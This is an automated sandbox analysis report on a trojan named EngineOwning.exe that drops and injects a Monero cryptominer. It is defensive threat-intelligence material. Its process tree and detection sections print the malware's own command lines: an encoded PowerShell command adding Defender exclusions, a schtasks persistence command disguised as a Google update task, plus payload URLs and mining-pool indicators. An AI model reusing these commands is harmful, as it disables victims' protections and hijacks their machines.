Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EngineOwning.exe

Overview

General Information

Sample Name:EngineOwning.exe
Analysis ID:616095
MD5:6b7e5f4517d6837eea3c06bae837f767
SHA1:e4b9405e06976b9721c3996cfb3ee95a1f8bb28c
SHA256:cd5e8cc37c3257aae9f285bc72c0a7e35a03c3f3c08be579aef4d0f0a31d82bb
Tags:exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Queries memory information (via WMI often done to detect virtual machines)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
DNS related to crypt mining pools
Connects to a pastebin service (likely for C&C)
Uses schtasks.exe or at.exe to add and modify task schedules
PE file contains section with special chars
Writes to foreign memory regions
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates driver files
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Sigma detected: Suspicious Execution of Powershell with Base64

Classification

  • System is w10x64
  • EngineOwning.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\EngineOwning.exe" MD5: 6B7E5F4517D6837EEA3C06BAE837F767)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3012 cmdline: C:\Windows\system32\cmd.exe /c start C:/ProgramData/winrsdhost.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • winrsdhost.exe (PID: 5428 cmdline: C:/ProgramData/winrsdhost.exe MD5: 108368196293017A706ADE912F519495)
        • cmd.exe (PID: 588 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 6744 cmdline: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
        • cmd.exe (PID: 2056 cmdline: C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5444 cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
        • cmd.exe (PID: 6644 cmdline: C:\Windows\System32\cmd.exe" cmd /c "C:\Users\user\AppData\Roaming\Windows\services86.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • services86.exe (PID: 6232 cmdline: C:\Users\user\AppData\Roaming\Windows\services86.exe MD5: 108368196293017A706ADE912F519495)
            • cmd.exe (PID: 6036 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • powershell.exe (PID: 2996 cmdline: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\System32\conhost.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • conhost.exe (PID: 5912 cmdline: C:\Windows\System32\conhost.exe" "pbsidfqjdbrp MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 5388 cmdline: C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng= MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • cmd.exe (PID: 5956 cmdline: C:\Windows\system32\cmd.exe /c start C:/ProgramData/mdsigstub.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • mdsigstub.exe (PID: 6436 cmdline: C:/ProgramData/mdsigstub.exe MD5: 62D39F4717804AE34F820704722C5284)
        • WerFault.exe (PID: 3376 cmdline: C:\Windows\system32\WerFault.exe -u -p 6436 -s 1072 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • WerFault.exe (PID: 6640 cmdline: C:\Windows\system32\WerFault.exe -u -p 7076 -s 1908 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5576 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4516 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6312 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5872 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
EngineOwning.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x2bbe0:$x1: https://cdn.discordapp.com/attachments/
  • 0x2bce0:$x1: https://cdn.discordapp.com/attachments/
SourceRuleDescriptionAuthorStrings
00000028.00000002.701324067.0000000000AD5000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000028.00000002.700493754.0000000000A68000.00000004.00000020.00020000.00000000.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
    • 0x19343:$s01: --cpu-priority=
    • 0x19337:$s06: --algo=rx/0
    00000028.00000002.701207386.0000000000AC2000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000028.00000002.701030193.0000000000AB4000.00000004.00000001.00020000.00000000.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
      • 0x6073:$s01: --cpu-priority=
      • 0x6067:$s06: --algo=rx/0
      00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x4e18c1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
      Click to see the 31 entries
      SourceRuleDescriptionAuthorStrings
      0.0.EngineOwning.exe.7ff75af60000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
      • 0x2bbe0:$x1: https://cdn.discordapp.com/attachments/
      • 0x2bce0:$x1: https://cdn.discordapp.com/attachments/
      0.0.EngineOwning.exe.7ff75af60000.1.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
      • 0x2bbe0:$x1: https://cdn.discordapp.com/attachments/
      • 0x2bce0:$x1: https://cdn.discordapp.com/attachments/
      0.2.EngineOwning.exe.7ff75af60000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
      • 0x2bbe0:$x1: https://cdn.discordapp.com/attachments/
      • 0x2bce0:$x1: https://cdn.discordapp.com/attachments/
      0.0.EngineOwning.exe.7ff75af60000.2.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
      • 0x2bbe0:$x1: https://cdn.discordapp.com/attachments/
      • 0x2bce0:$x1: https://cdn.discordapp.com/attachments/
      40.0.explorer.exe.140000000.3.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x4e0ac1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
      Click to see the 53 entries

      There are no malicious signatures, click here to show all signatures.

      Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A", CommandLine: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 588, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A", ProcessId: 6744, ProcessName: powershell.exe
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\EngineOwning.exe, ProcessId: 7076, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A", CommandLine: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 588, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A", ProcessId: 6744, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Users\user\Desktop\EngineOwning.exe" , ParentImage: C:\Users\user\Desktop\EngineOwning.exe, ParentProcessId: 7076, ParentProcessName: EngineOwning.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7088, ProcessName: conhost.exe
      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132955061562231753.6744.DefaultAppDomain.powershell
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exeAvira: detection malicious, Label: HEUR/AGEN.1202861
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exeAvira: detection malicious, Label: TR/Dropper.Gen
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeAvira: detection malicious, Label: TR/Dropper.Gen
      Source: C:\ProgramData\winrsdhost.exeAvira: detection malicious, Label: TR/Dropper.Gen
      Source: C:\ProgramData\mdsigstub.exeAvira: detection malicious, Label: HEUR/AGEN.1202861
      Source: EngineOwning.exeVirustotal: Detection: 24%Perma Link
      Source: EngineOwning.exeReversingLabs: Detection: 19%
      Source: C:\ProgramData\mdsigstub.exeVirustotal: Detection: 72%Perma Link
      Source: C:\ProgramData\mdsigstub.exeMetadefender: Detection: 34%Perma Link
      Source: C:\ProgramData\mdsigstub.exeReversingLabs: Detection: 76%
      Source: C:\ProgramData\winrsdhost.exeVirustotal: Detection: 24%Perma Link
      Source: C:\ProgramData\winrsdhost.exeReversingLabs: Detection: 41%
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exeVirustotal: Detection: 72%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exeMetadefender: Detection: 34%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exeReversingLabs: Detection: 76%
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exeReversingLabs: Detection: 41%
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\winrsdhost.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\mdsigstub.exeJoe Sandbox ML: detected
      Source: 29.0.services86.exe.ed0000.0.unpackAvira: Label: TR/Dropper.Gen
      Source: 4.0.winrsdhost.exe.50000.0.unpackAvira: Label: TR/Dropper.Gen

      Bitcoin Miner

      barindex
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000028.00000002.701324067.0000000000AD5000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.701207386.0000000000AC2000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: services86.exe PID: 6232, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
      Source: services86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
      Source: unknownDNS query: name: xmr-eu1.nanopool.org
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: EngineOwning.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
      Source: Binary string: C:\Users\User\Desktop\visual studio crypting\main (c++)_2\x64\Release\vexternal.pdb source: EngineOwning.exe, 00000000.00000000.493154695.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp, EngineOwning.exe, 00000000.00000000.429374377.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\User\Desktop\visual studio crypting\main (c++)_2\x64\Release\vexternal.pdbDC source: EngineOwning.exe, 00000000.00000000.493154695.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp, EngineOwning.exe, 00000000.00000000.429374377.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF76BF0 UnregisterDeviceNotification,DestroyWindow,SystemParametersInfoW,free,free,

      Networking

      barindex
      Source: unknownDNS query: name: pastebin.com
      Source: powershell.exe, 0000000C.00000002.518394259.0000018437FCF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
